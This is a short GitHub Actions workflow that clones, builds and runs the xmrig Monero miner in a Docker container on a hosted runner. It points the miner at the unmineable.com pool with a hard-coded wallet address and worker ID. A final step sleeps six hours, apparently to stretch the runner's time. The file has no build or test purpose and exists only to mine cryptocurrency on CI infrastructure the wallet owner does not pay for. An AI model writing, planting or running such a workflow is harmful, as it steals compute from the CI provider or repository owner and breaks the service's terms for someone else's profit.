name: Build and Run xmrig

on:
  workflow_dispatch:

jobs:
  build-and-run:
    runs-on: ubuntu-latest

    steps:
      - name: Check out repository
        uses: actions/checkout@v2

      - name: Build and Run xmrig in Docker
        run: |
          echo "Running in Docker..."
          docker run --rm -v ${{ github.workspace }}:/workspace -w /workspace ubuntu:latest bash -c "
          apt update && \
          apt install -y git build-essential cmake libuv1-dev libssl-dev libhwloc-dev && \
          git clone https://github.com/xmrig/xmrig.git && \
          cd xmrig && \
          mkdir build && \
          cd build && \
          cmake .. && \
          make && \
          ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:88ShoRuQAns2zfCrQWqC9M6bBjCCBf4xs7TNyXDK3iHsdkQTRaK75MNUxqzw4X62bwF2ik6HwBeJeNdsTTy98MUnS9Q4Rmp.unmineable_worker_tsjcm#mvbs-zlx7 -p x
          "

      - name: Wait for 6 hours
        run: |
          echo "Waiting for 6 hours..."
          sleep 21600  # Sleep for 6 hours (21600 seconds)
          
